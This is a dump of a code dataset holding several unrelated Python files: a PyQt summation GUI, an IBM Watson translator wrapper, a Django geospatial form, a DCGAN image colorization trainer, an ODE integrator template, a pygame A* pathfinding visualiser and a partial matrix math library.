#P.display.flip()\n P.flip()\n InputState.clear_tick_states()\n # Client rendering timed by server update messages\n # self.clock.tick(60)\n self.server_connection.shutdown()\n# pygame.display.quit()\n\nHOST_ADDR = 1 {}'.format(k, v))\n # pass\n\n\nif __name__ == '__main__':\n count_sum()\n","sub_path":"xiaoscript/product/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"194274766","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nfrom Cython.Compiler.Naming import self_cname\nimport string\n\nform_class = uic.loadUiType(\"myqt04.ui\")[0]\n\nclass MyWindow(QMainWindow, form_class):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pb.clicked.connect(self.myclick)\n \n def myclick(self):\n obj = QLineEdit(self.le1)\n # 메서드 종류를 모를 때 obj로 그 객체를 받아와서 ctrl+space로 찍어보자\n obj.setText()\n \n num1 = self.le1.text()\n num2 = self.le2.text()\n \n result = 0\n for i in range(int(num1), int(num2)+1):\n result += i\n \n self.le3.setText(str(result))\n \nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n myWindow = MyWindow()\n myWindow.show()\n app.exec_()","sub_path":"HELLOPYTHON/day04/myqt04.py","file_name":"myqt04.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"396478768","text":"'''\ntranslator.py\nCreates instantiation of IBM Watson Language Translator.\nMethods available to translate text from English to French and from French to English.\n'''\n\nimport json\nimport os\nfrom ibm_watson import LanguageTranslatorV3\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napikey = os.environ['apikey']\nurl = os.environ['url']\n\n\nauthenticator = IAMAuthenticator(f'{apikey}')\nlanguage_translator = LanguageTranslatorV3(\n version='2018-05-01',\n authenticator=authenticator\n)\n\nlanguage_translator.set_service_url(f'{url}')\n\ndef english_to_french(english_text):\n \"\"\"\n Returns the french translation of the english text passed in the parameter\n \"\"\"\n if english_text is None:\n return \"\"\n\n translation = language_translator.translate(\n text = english_text,\n model_id = 'en-fr'\n ).get_result()\n french_text = translation['translations'][0]['translation']\n return french_text\n\n\ndef french_to_english(french_text):\n \"\"\"\n Returns the english translation of the french text passed in the parameter\n \"\"\"\n if french_text is None:\n return \"\"\n\n translation = language_translator.translate(\n text = french_text,\n model_id = 'fr-en'\n ).get_result()\n english_text = translation['translations'][0]['translation']\n return english_text\n","sub_path":"final_project/machinetranslation/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"482819612","text":"from corehq.apps.hqwebapp import crispy as hqcrispy\nfrom crispy_forms import layout as crispy\nfrom crispy_forms.bootstrap import StrictButton\n\nfrom django.utils.translation import gettext_lazy as _\nfrom django import forms\nfrom corehq.apps.geospatial.models import GeoConfig\n\n\nLOCATION_SOURCE_OPTIONS = [\n (GeoConfig.CUSTOM_USER_PROPERTY, _(\"Custom user field\")),\n (GeoConfig.ASSIGNED_LOCATION, _(\"User's assigned location\")),\n]\n\n\nclass GeospatialConfigForm(forms.ModelForm):\n\n class Meta:\n model = GeoConfig\n fields = [\n \"user_location_property_name\",\n \"case_location_property_name\"\n ]\n\n user_location_property_name = forms.CharField(\n label=_(\"Fetch mobile worker location data from custom field\"),\n required=True,\n help_text=_(\"The name of the mobile worker custom field which stores the users' geo-location data.\"),\n )\n case_location_property_name = forms.CharField(\n label=_(\"Fetch case location data from property\"),\n required=True,\n help_text=_(\"The name of the case property storing the geo-location data of your cases.\"),\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.helper = hqcrispy.HQFormHelper()\n self.helper.add_layout(\n crispy.Layout(\n crispy.Fieldset(\n _(\"Configure Geospatial Settings\"),\n crispy.Field(\n 'user_location_property_name',\n data_bind=\"value: customUserFieldName\"\n ),\n crispy.Field('case_location_property_name', data_bind=\"value: geoCasePropertyName\"),\n ),\n hqcrispy.FormActions(\n StrictButton(\n _('Save'),\n css_class='btn-primary disable-on-submit',\n type='submit',\n data_bind=\"\"\n )\n )\n )\n )\n","sub_path":"corehq/apps/geospatial/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"295737777","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 07:05:30 2019\n\n@author: Stefan Draghici\n\"\"\"\n\ndef searching(string):\n print('Searching string: {}'.format(string))\n while True:\n name=(yield)\n if string in name:\n print(name)\n \nx=searching('hello')\nx.__next__()\nx.send('hello')","sub_path":"couroutine.py","file_name":"couroutine.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"422915271","text":"#DCGAN WITH PERCEPTUAL LOSS FUNCTION USED FOR COLORALIZATION\n\nfrom PIL import Image\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.optim import Adam\nfrom torchvision import transforms\nimport torchvision.datasets as dsets\nimport torch.nn.functional as F\nimport numpy as np\nfrom vgg import Vgg16\nfrom manipulation import save_images\n\nfrom dataloader import *\nfrom utils import *\n\n\n\nclass Discriminator(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv_1 = nn.Conv2d(3, 32, 3, stride=2, padding=2)\n self.conv_2 = nn.Conv2d(32, 64, 3, stride=2, padding=2)\n self.conv_3 = nn.Conv2d(64, 128, 3, stride=2, padding=2)\n self.conv_4 = nn.Conv2d(128, 64, 3, stride=2, padding=2)\n self.conv_5= nn.Conv2d(64, 1, 3, stride=2, padding=2)\n self.conv_1_bn = nn.BatchNorm2d(32)\n self.conv_2_bn = nn.BatchNorm2d(64)\n self.conv_3_bn = nn.BatchNorm2d(128)\n self.conv_4_bn = nn.BatchNorm2d(64)\n\n # should be corrected if new image arrive\n # self.fc = nn.Linear(dim * 4 * 4, 1)\n\n def forward(self, x):\n x = F.leaky_relu(self.conv_1(x), 0.1)\n x = F.leaky_relu(self.conv_2_bn(self.conv_2(x)), 0.1)\n x = F.leaky_relu(self.conv_3_bn(self.conv_3(x)), 0.1)\n x = F.leaky_relu(self.conv_4_bn(self.conv_4(x)), 0.1)\n x = self.conv_5(x)\n x = x.view(x.size(0), -1).mean(1)\n x = F.sigmoid(x)\n\n return x\n\nclass Generator(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.conv_1 = nn.Conv2d(1, 32, 4, stride=2)\n self.conv_2 = nn.Conv2d(32, 64, 3, stride=2)\n self.conv_3 = nn.Conv2d(64, 128, 3, stride=2)\n self.deconv_1 = nn.ConvTranspose2d(128, 64, 3, stride=2)\n self.deconv_2 = nn.ConvTranspose2d(64, 32, 3, stride=2)\n self.deconv_3 = nn.ConvTranspose2d(32, 3, 4, stride=2)\n\n self.conv_1_bn = nn.BatchNorm2d(32)\n self.conv_2_bn = nn.BatchNorm2d(64)\n self.conv_3_bn = nn.BatchNorm2d(128)\n self.deconv_1_bn = nn.BatchNorm2d(64)\n self.deconv_2_bn = nn.BatchNorm2d(32)\n\n def forward(self, x):\n x = F.leaky_relu(self.conv_1(x))\n x = F.leaky_relu(self.conv_2_bn(self.conv_2(x)))\n x = F.leaky_relu(self.conv_3_bn(self.conv_3(x)))\n x = F.leaky_relu(self.deconv_1_bn(self.deconv_1(x)))\n x = F.leaky_relu(self.deconv_2_bn(self.deconv_2(x)))\n x = F.tanh(self.deconv_3(x))\n return x\n\n\ndef train_GAN(use_cuda=False, numb_style_images=100):\n path = \"/data/\" if use_cuda else \"/home/dobosevych/Documents/Cats/\"\n train_loader = load_data(path, upper_bound=21000)\n test_loader = load_data(path, lower_bound=21000, upper_bound=22000)\n\n lr = 0.0002\n betas = (0.5, 0.999)\n discriminator = Discriminator()\n generator = Generator()\n vgg = Vgg16(requires_grad=False)\n if use_cuda:\n vgg.cuda()\n styles = get_gram_matrices(next(iter(train_loader)))\n\n if use_cuda:\n discriminator = discriminator.cuda()\n generator = generator.cuda()\n\n d_optimizer = Adam(discriminator.parameters(), lr=lr, betas=betas)\n g_optimizer = Adam(generator.parameters(), lr=lr, betas=betas)\n criterion_BCE = nn.BCELoss()\n criterion_MSE = nn.MSELoss()\n\n num_epochs = 20\n num_of_samples = 100\n\n for epoch in range(num_epochs):\n for i, (color_images, b_and_w_images) in enumerate(train_loader):\n minibatch = color_images.size(0)\n\n # damaged = make_damaged(images)\n # damaged = Variable(damaged)\n color_images = Variable(color_images)\n b_and_w_images = Variable(b_and_w_images)\n labels_1 = Variable(torch.ones(minibatch))\n labels_0 = Variable(torch.zeros(minibatch))\n\n if use_cuda:\n color_images, b_and_w_images, labels_0, labels_1 = color_images.cuda(), b_and_w_images.cuda(), labels_0.cuda(), labels_1.cuda()#, damaged.cuda()\n\n # Generator training\n generated_images = generator(b_and_w_images)\n out = discriminator(generated_images)\n\n\n styleloss = 0\n\n for style_img in styles:\n styleloss += style_loss(style_img, generated_images, vgg, minibatch)\n\n\n\n # loss_img = criterion_MSE(generated_images, color_images)\n loss_1 = criterion_BCE(out, labels_1)\n # g_loss = 100 * loss_img + loss_1\n g_loss = 100 * styleloss + loss_1\n g_loss.backward()\n g_optimizer.step()\n\n # Discriminator training\n generated_images = generator(b_and_w_images)\n discriminator.zero_grad()\n out_0 = discriminator(generated_images)\n loss_0 = criterion_BCE(out_0, labels_0)\n\n out_1 = discriminator(color_images)\n loss_1 = criterion_BCE(out_1, labels_1)\n\n d_loss = loss_0 + loss_1\n d_loss.backward()\n d_optimizer.step()\n\n print(\"Epoch: [{}/{}], Step: [{}/{}]\".format(epoch + 1, num_epochs, i + 1, len(train_loader)))\n\n test_images_color, test_images_bw = next(iter(test_loader))\n test_images_bw = Variable(test_images_bw)\n\n if use_cuda:\n test_images_bw = test_images_bw.cuda()\n\n test_images_colored = generator(test_images_bw)\n test_images_colored = test_images_colored.view(num_of_samples, 3, 128, 128).data.cpu().numpy()\n filename_colored = \"/output/epoch_{}/colored/sample\" if use_cuda else \"samples/epoch_{}/colored/sample\"\n filename_bw = \"/output/epoch_{}/black_and_white/sample\" if use_cuda else \"samples/epoch_{}/black_and_white/sample\"\n filename_color = \"/output/epoch_{}/incolor/sample\" if use_cuda else \"samples/epoch_{}/incolor/sample\"\n\n save_images(test_images_colored, filename=filename_colored.format(epoch + 1), width=10, size=(3, 128, 128))\n save_images(test_images_bw, filename=filename_bw.format(epoch + 1), width=10, size=(3, 128, 128))\n save_images(test_images_color, filename=filename_color.format(epoch + 1), width=10, size=(3, 128, 128))\n\n\nif __name__ == \"__main__\":\n train_GAN(True)\n","sub_path":"DCGAN.py","file_name":"DCGAN.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530665650","text":"from .. import backend as D\n\n__all__ = [\n 'IntegratorTemplate',\n 'RichardsonIntegratorTemplate'\n]\n\nclass IntegratorTemplate(object):\n def __init__(self):\n raise NotImplementedError(\"Do not initialise this class directly!\")\n\n def forward(self, rhs, initial_time, initial_state, constants, timestep):\n raise NotImplementedError(\"Do not use this class directly! How did you initialise it??\")\n \n def dense_output(self):\n raise NotImplementedError(\"Do not use this class directly! How did you initialise it??\")\n\n __call__ = forward\n\n def update_timestep(self, initial_state, dState, diff, initial_time, timestep, tol=0.8):\n err_estimate = D.max(D.abs(D.to_float(diff)))\n relerr = D.max(D.to_float(self.atol + self.rtol * D.abs(initial_state) + self.rtol * D.abs(dState / timestep)))\n if err_estimate != 0:\n corr = timestep * tol * (relerr / err_estimate) ** (1.0 / self.order)\n if corr != 0:\n timestep = corr\n if err_estimate > relerr:\n return timestep, True\n else:\n return timestep, False\n \n @classmethod\n def __str__(cls):\n return cls.__name__\n \n def __repr__(self):\n if D.backend() == 'torch':\n return \"<{}({},{},{},{},{})>\".format(self.__class__.__name__, self.dim, self.dtype, self.rtol, self.atol, self.device)\n else:\n return \"<{}({},{},{},{})>\".format(self.__class__.__name__, self.dim, self.dtype, self.rtol, self.atol)\n\n\nclass RichardsonIntegratorTemplate(IntegratorTemplate):\n __symplectic__ = False\n __adaptive__ = True\n\n def __init__(self):\n raise NotImplementedError(\"Do not initialise this class directly!\")\n\n def dense_output(self):\n return self.__interpolant_times, self.__interpolants\n \n def adaptive_richardson(self, rhs, t, y, constants, timestep):\n dt0, (dt_z, dy_z) = self.step(0, rhs, t, y, timestep, constants, 1)\n if dt_z < timestep:\n timestep = dt_z\n self.aux[0, 0] = dy_z\n prev_error = None\n for m in range(1, self.richardson_iter):\n self.aux[m, 0] = self.step(m, rhs, t, y, timestep, constants, 1 << m)[1][1]\n for n in range(1, m+1):\n self.aux[m, n] = self.aux[m, n - 1] + (self.aux[m, n - 1] - self.aux[m - 1, n - 1]) / ((1 << n) - 1)\n self.order = self.basis_order + m + 1\n if m >= 3:\n prev_error, t_conv = self.check_converged(self.aux[m, n], self.aux[m - 1, m - 1] - self.aux[m, m], prev_error)\n if t_conv:\n break\n\n return timestep, (timestep, self.aux[m - 1, n - 1]), self.aux[m - 1, m - 1] - self.aux[m, m]\n\n def check_converged(self, initial_state, diff, prev_error):\n err_estimate = D.max(D.abs(D.to_float(diff)))\n relerr = D.max(D.to_float(self.atol + self.rtol * D.abs(initial_state)))\n if prev_error is None or (err_estimate > relerr and err_estimate <= D.max(D.abs(D.to_float(prev_error)))):\n return diff, False\n else:\n return diff, True\n\n def step(self, int_num, rhs, initial_time, initial_state, timestep, constants, num_intervals):\n dt_now, dstate_now = 0.0, 0.0\n dtstep = timestep / num_intervals\n self.__interpolants = []\n self.__interpolant_times = []\n for interval in range(num_intervals):\n dt, (dt_z, dy_z) = self.basis_integrators[int_num](rhs, initial_time + dt_now, initial_state + dstate_now, constants, dtstep)\n dt_now = dt_now + dt_z\n dstate_now = dstate_now + dy_z\n __interp_t, __interp = self.basis_integrators[int_num].dense_output()\n self.__interpolant_times.append(__interp_t)\n self.__interpolants.append(__interp)\n return dtstep, (dt_now, dstate_now)\n\n def forward(self, rhs, initial_time, initial_state, constants, timestep):\n dt0, (dt_z, dy_z), diff = self.adaptive_richardson(rhs, initial_time, initial_state, constants, timestep)\n\n self.dState = dy_z + 0.0\n self.dTime = D.copy(dt_z)\n \n new_timestep, redo_step = self.update_timestep(initial_state, self.dState, diff, initial_time, dt_z, tol=0.5 if self.__implicit__ else 0.9)\n if self.__symplectic__:\n timestep = dt0\n next_timestep = D.copy(dt0)\n if (0.8*new_timestep+0.2*timestep) < next_timestep:\n while new_timestep < next_timestep:\n next_timestep /= 2.0\n else:\n while (0.8*new_timestep+0.2*timestep) > 2*next_timestep:\n next_timestep *= 2.0\n redo_step = False\n else:\n next_timestep = new_timestep\n if redo_step:\n timestep, (self.dTime, self.dState) = self(rhs, initial_time, initial_state, constants, next_timestep)\n else:\n timestep = next_timestep\n \n return timestep, (self.dTime, self.dState)\n\n __call__ = forward","sub_path":"desolver/integrators/integrator_template.py","file_name":"integrator_template.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"455687708","text":"import pygame\r\nimport math\r\nfrom queue import PriorityQueue\r\n\r\nWIDTH = 900\r\nWIN = pygame.display.set_mode((WIDTH, WIDTH))\r\npygame.display.set_caption(\"A* Path Finding Algorithm\")\r\n\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 255, 0)\r\nYELLOW = (255, 255, 0)\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nPURPLE = (128, 0, 128)\r\nORANGE = (255, 165 ,0)\r\nGREY = (128, 128, 128)\r\nAGUA = (0, 128, 128)\r\n\r\n\r\n\r\nclass Mark:\r\n\tdef __init__(graph, row, col, width, total_rows):\r\n\t\tgraph.row = row\r\n\t\tgraph.col = col\r\n\t\tgraph.x = row * width\r\n\t\tgraph.y = col * width\r\n\t\tgraph.color = WHITE\r\n\t\tgraph.neighbors = []\r\n\t\tgraph.width = width\r\n\t\tgraph.total_rows = total_rows\r\n\r\n\tdef get_pos(graph):\r\n\t\treturn graph.row, graph.col\r\n\r\n\tdef is_closed(graph):\r\n\t\treturn graph.color == AGUA\r\n\r\n\tdef is_open(graph):\r\n\t\treturn graph.color == ORANGE\r\n\r\n\tdef is_barrier(graph):\r\n\t\treturn graph.color == BLACK\r\n\r\n\tdef is_start(graph):\r\n\t\treturn graph.color == BLACK\r\n\r\n\tdef is_end(graph):\r\n\t\treturn graph.color == RED\r\n\r\n\tdef reset(graph):\r\n\t\tgraph.color = WHITE\r\n\r\n\tdef make_start(graph):\r\n\t\tgraph.color = BLACK\r\n\r\n\r\n\tdef make_closed(graph):\r\n\t\tgraph.color = AGUA\r\n\r\n\tdef make_open(graph):\r\n\t\tgraph.color = GREEN\r\n\r\n\tdef make_barrier(graph):\r\n\t\tgraph.color = PURPLE\r\n\r\n\tdef make_end(graph):\r\n\t\tgraph.color = RED\r\n\r\n\tdef make_path(graph):\r\n\t\tgraph.color = ORANGE\r\n\r\n\tdef draw(graph, win):\r\n\t\tpygame.draw.rect(win, graph.color, (graph.x, graph.y, graph.width, graph.width))\r\n\r\n\tdef update_neighbors(graph, grid):\r\n\t\tgraph.neighbors = []\r\n\t\tif graph.row < graph.total_rows - 1 and not grid[graph.row + 1][graph.col].is_barrier(): \r\n\t\t\tgraph.neighbors.append(grid[graph.row + 1][graph.col])\r\n\r\n\t\tif graph.row > 0 and not grid[graph.row - 1][graph.col].is_barrier(): # UP\r\n\t\t\tgraph.neighbors.append(grid[graph.row - 1][graph.col])\r\n\r\n\t\tif graph.col < graph.total_rows - 1 and not grid[graph.row][graph.col + 1].is_barrier(): # RIGHT\r\n\t\t\tgraph.neighbors.append(grid[graph.row][graph.col + 1])\r\n\r\n\t\tif graph.col > 0 and not grid[graph.row][graph.col - 1].is_barrier(): # LEFT\r\n\t\t\tgraph.neighbors.append(grid[graph.row][graph.col - 1])\r\n\r\n\tdef __lt__(graph, other):\r\n\t\treturn False\r\n\r\n\r\ndef h(p1, p2):\r\n\tx1, y1 = p1\r\n\tx2, y2 = p2\r\n\treturn abs(x1 - x2) + abs(y1 - y2)\r\n\r\n\r\ndef reconstruct_path(came_from, current, draw):\r\n\twhile current in came_from:\r\n\t\tcurrent = came_from[current]\r\n\t\tcurrent.make_path()\r\n\t\tdraw()\r\n\r\n\r\ndef algorithm(draw, grid, start, end):\r\n\tcount = 0\r\n\topen_set = PriorityQueue()\r\n\topen_set.put((0, count, start))\r\n\tcame_from = {}\r\n\tg_score = {mark: float(\"inf\") for row in grid for mark in row}\r\n\tg_score[start] = 0\r\n\tf_score = {mark: float(\"inf\") for row in grid for mark in row}\r\n\tf_score[start] = h(start.get_pos(), end.get_pos())\r\n\r\n\topen_set_hash = {start}\r\n\r\n\twhile not open_set.empty():\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.quit()\r\n\r\n\t\tcurrent = open_set.get()[2]\r\n\t\topen_set_hash.remove(current)\r\n\r\n\t\tif current == end:\r\n\t\t\treconstruct_path(came_from, end, draw)\r\n\t\t\tend.make_end()\r\n\t\t\treturn True\r\n\r\n\t\tfor neighbor in current.neighbors:\r\n\t\t\ttemp_g_score = g_score[current] + 1\r\n\r\n\t\t\tif temp_g_score < g_score[neighbor]:\r\n\t\t\t\tcame_from[neighbor] = current\r\n\t\t\t\tg_score[neighbor] = temp_g_score\r\n\t\t\t\tf_score[neighbor] = temp_g_score + h(neighbor.get_pos(), end.get_pos())\r\n\t\t\t\tif neighbor not in open_set_hash:\r\n\t\t\t\t\tcount += 1\r\n\t\t\t\t\topen_set.put((f_score[neighbor], count, neighbor))\r\n\t\t\t\t\topen_set_hash.add(neighbor)\r\n\t\t\t\t\tneighbor.make_open()\r\n\r\n\t\tdraw()\r\n\r\n\t\tif current != start:\r\n\t\t\tcurrent.make_closed()\r\n\r\n\treturn False\r\n\r\n\r\ndef make_grid(rows, width):\r\n\tgrid = []\r\n\tgap = width // rows\r\n\tfor i in range(rows):\r\n\t\tgrid.append([])\r\n\t\tfor j in range(rows):\r\n\t\t\tmark = Mark(i, j, gap, rows)\r\n\t\t\tgrid[i].append(mark)\r\n\r\n\treturn grid\r\n\r\n\r\ndef draw_grid(win, rows, width):\r\n\tgap = width // rows\r\n\tfor i in range(rows):\r\n\t\tpygame.draw.line(win, GREY, (0, i * gap), (width, i * gap))\r\n\t\tfor j in range(rows):\r\n\t\t\tpygame.draw.line(win, GREY, (j * gap, 0), (j * gap, width))\r\n\r\n\r\ndef draw(win, grid, rows, width):\r\n\twin.fill(WHITE)\r\n\r\n\tfor row in grid:\r\n\t\tfor mark in row:\r\n\t\t\tmark.draw(win)\r\n\r\n\tdraw_grid(win, rows, width)\r\n\tpygame.display.update()\r\n\r\n\r\ndef get_clicked_pos(pos, rows, width):\r\n\tgap = width // rows\r\n\ty, x = pos\r\n\r\n\trow = y // gap\r\n\tcol = x // gap\r\n\r\n\treturn row, col\r\n\r\n\r\ndef main(win, width):\r\n\tROWS = 50\r\n\tgrid = make_grid(ROWS, width)\r\n\r\n\tstart = None\r\n\tend = None\r\n\r\n\trun = True\r\n\twhile run:\r\n\t\tdraw(win, grid, ROWS, width)\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\trun = False\r\n\r\n\t\t\tif pygame.mouse.get_pressed()[0]: \r\n\t\t\t\tpos = pygame.mouse.get_pos()\r\n\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\r\n\t\t\t\tmark = grid[row][col]\r\n\t\t\t\tif not start and mark != end:\r\n\t\t\t\t\tstart = mark\r\n\t\t\t\t\tstart.make_start()\r\n\r\n\t\t\t\telif not end and mark != start:\r\n\t\t\t\t\tend = mark\r\n\t\t\t\t\tend.make_end()\r\n\r\n\t\t\t\telif mark != end and mark != start:\r\n\t\t\t\t\tmark.make_barrier()\r\n\r\n\t\t\telif pygame.mouse.get_pressed()[2]:\r\n\t\t\t\tpos = pygame.mouse.get_pos()\r\n\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\r\n\t\t\t\tmark = grid[row][col]\r\n\t\t\t\tmark.reset()\r\n\t\t\t\tif mark == start:\r\n\t\t\t\t\tstart = None\r\n\t\t\t\telif mark == end:\r\n\t\t\t\t\tend = None\r\n\r\n\t\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\t\tif event.key == pygame.K_SPACE and start and end:\r\n\t\t\t\t\tfor row in grid:\r\n\t\t\t\t\t\tfor mark in row:\r\n\t\t\t\t\t\t\tmark.update_neighbors(grid)\r\n\r\n\t\t\t\t\talgorithm(lambda: draw(win, grid, ROWS, width), grid, start, end)\r\n\r\n\t\t\t\tif event.key == pygame.K_c:\r\n\t\t\t\t\tstart = None\r\n\t\t\t\t\tend = None\r\n\t\t\t\t\tgrid = make_grid(ROWS, width)\r\n\r\n\tpygame.quit()\r\n\r\nmain(WIN, WIDTH)\r\n","sub_path":"astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":5603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"511181402","text":"# Librería de operaciones matemáticas\nfrom collections import namedtuple\nimport numpy as np\n\nV3 = namedtuple('Point3', ['x', 'y', 'z'])\nV4 = namedtuple('Point4', ['x', 'y', 'z', 'w'])\n\n# Resta de 2 vectores\ndef subtract(v1, v2):\n result = []\n\n if isinstance(v1, (float, int)):\n for i in range(len(v2)):\n result.append(v1 - v2[i])\n elif isinstance(v2, (float, int)):\n for i in range(len(v1)):\n result.append(v1[i] - v1)\n elif len(v1) == len(v2):\n for i in range(len(v1)):\n result.append(v1[i] - v2[i])\n else:\n return\n\n return result\n\n# Suma de 2 vectores\ndef sum(v1, v2):\n result = []\n\n if isinstance(v1, (float, int)):\n for i in range(len(v2)):\n result.append(v1 + v2[i])\n if isinstance(v2, (float, int)):\n for i in range(len(v1)):\n result.append(v1[i] + v2)\n elif len(v1) == len(v2):\n for i in range(len(v1)):\n result.append(v1[i] + v2[i])\n else:\n return\n\n return result\n\n# Multiplicación entre 2 vectores\ndef multiply(a, b):\n result = []\n\n if isinstance(a, (float, int)):\n for i in range(len(b)):\n result.append(a * b[i])\n elif len(a) == len(b):\n for i in range(len(a)):\n result.append(a[i] * b[i])\n else:\n return\n\n return result\n\ndef divide(a, b):\n result = []\n\n if isinstance(a, (float, int)):\n for i in range(len(b)):\n result.append(a / b[i])\n elif len(a) == len(b):\n for i in range(len(a)):\n result.append(a[i] / b[i])\n else:\n return\n\n return result\n\n\n# Producto cruz entre 2 vectores\ndef cross(a, b):\n result = []\n\n if len(a) == 2 and len(b) == 2:\n result.append((a[0] * b[1]) - (a[1] * b[0]))\n return result[0]\n else:\n result.append((a[1] * b[2]) - (a[2] * b[1]))\n result.append((a[2] * b[0]) - (a[0] * b[2]))\n result.append((a[0] * b[1]) - (a[1] * b[0]))\n\n return result\n\n# Operación punto entre 2 vectores\ndef dot(a, b):\n result = []\n dot_result = 0\n\n if isinstance(a, (float, int)):\n for i in range(len(b)):\n result.append(a * b[i])\n return result\n elif len(a) == len(b):\n for i in range(len(a)):\n result.append(a[i] * b[i])\n for r in result:\n dot_result += r\n return dot_result\n else:\n return\n\n\ndef hypotenuse(v):\n r = 0\n for a in v:\n r += pow(a, 2)\n\n r = pow(r, 0.5)\n\n return r\n\n\n# Normaliza un vector\ndef normalize(v):\n result = []\n r = 0\n for a in v:\n r += pow(a, 2)\n\n r = pow(r, 0.5)\n\n if r != 0:\n for a in v:\n result.append(a / r)\n else:\n return v\n\n return result\n\n# Valor aproximado de pi\ndef pi():\n return 3.1415926535897932384626433\n\n# Convierte de grados a radianes\ndef deg2rad(deg):\n return (deg * pi()) / 180\n\nclass Matrix(object):\n def __init__(self, matrix):\n self.matrix = matrix\n self.rows = len(matrix)\n self.cols = len(matrix[0])\n\n def __len__(self):\n return len(self.matrix)\n\n # Multiplicación matrix * matrix o matrix * vector\n def __matmul__(self, other):\n\n # Valida si el segundo argumento es una matrix\n if isinstance(other, Matrix):\n c = Matrix([[0 for x in range(other.cols)] for y in range(self.rows)])\n\n if self.cols != other.rows:\n raise ValueError('The number of columns (first matrix), and rows (second matrix) must coincide')\n\n for y in range(self.rows):\n for a in range(other.cols):\n x = 0\n for b in range(other.rows):\n x += self.matrix[y][b] * other.matrix[b][a]\n c.matrix[y][a] = x\n\n # Valida si el segundo argumento es un vector\n # Arreglar validación para que verifique si es una instancia de V3 o V4\n else:\n c = Matrix([[0 for x in range(self.rows)] for y in range(1)])\n rows = len(other)\n if self.cols != rows:\n raise ValueError('The number of columns of the matrix, and the size of the vector must coincide')\n for y in range(self.rows):\n x = 0\n for a in range(rows):\n x += self.matrix[y][a] * other[a]\n c.matrix[0][y] = x\n\n return c\n\n # Elimina una fila o columna de una matrix\n def delete(self, obj, axis=None):\n # Elimina una columna\n result = []\n if axis == 1:\n for y in self.matrix:\n fila = []\n for x in range(len(y)):\n if x != obj:\n fila.append(y[x])\n result.append(fila)\n # Elimina una fila\n else:\n cont = 0\n for fila in self.matrix:\n if cont != obj:\n result.append(fila)\n cont += 1\n\n return result\n\n # Calcula el determinante de una matrix\n def det(self):\n if self.cols != self.rows:\n raise ValueError('The number of columns and rows must coincide')\n\n determinant = 0\n # Verifica que la dimensión de la matriz sea mayor a 2\n if self.rows != 2:\n cols = []\n rows = []\n # Busca filas y columnas con 0\n for y in range(self.rows):\n fila = 0\n col = 0\n for x in range(self.cols):\n if self.matrix[y][x] == 0:\n fila += 1\n if self.matrix[x][y] == 0:\n col += 1\n rows.append(fila)\n cols.append(col)\n\n # Evalúa las filas y columnas para utilizar la que tiene más 0´s\n col = max(cols)\n row = max(rows)\n\n # Cuando hay más 0´s en las columnas\n if col > row:\n x = cols.index(col)\n determinant = 0\n for y in range(self.rows):\n det = 0\n if self.matrix[y][x] != 0:\n matrix = Matrix(self.delete(x, 1))\n a_matrix = Matrix(matrix.delete(y))\n value = pow(-1, (y + x)) * self.matrix[y][x]\n if a_matrix.rows == 3:\n det = value * a_matrix.det()\n if a_matrix.rows == 2:\n adjunto = (a_matrix.matrix[0][0] * a_matrix.matrix[1][1]) - \\\n (a_matrix.matrix[0][1] * a_matrix.matrix[1][0])\n det = value * adjunto\n determinant += det\n # Cuando hay más 0´s en las filas o tienen la misma cantidad de 0´s\n else:\n y = rows.index(row)\n determinant = 0\n for x in range(self.rows):\n det = 0\n if self.matrix[y][x] != 0:\n matrix = Matrix(self.delete(x, 1))\n a_matrix = Matrix(matrix.delete(y))\n value = pow(-1, (y + x)) * self.matrix[y][x]\n if a_matrix.rows == 3:\n det = value * a_matrix.det()\n if a_matrix.rows == 2:\n adjunto = (a_matrix.matrix[0][0] * a_matrix.matrix[1][1]) - \\\n (a_matrix.matrix[0][1] * a_matrix.matrix[1][0])\n det = value * adjunto\n determinant += det\n # Cuando la dimensión de la matriz es igual a 2\n elif self.rows == 2:\n determinant = (self.matrix[0][0] * self.matrix[1][1]) - \\\n (self.matrix[0][1] * self.matrix[1][0])\n\n return determinant\n\n # Encuentra la matriz adjunta\n def adjunctMatrix(self):\n result = Matrix([[0 for x in range(self.cols)] for y in range(self.rows)])\n\n for y in range(self.rows):\n for x in range(self.cols):\n matrix = Matrix(self.delete(x, 1))\n a_matrix = 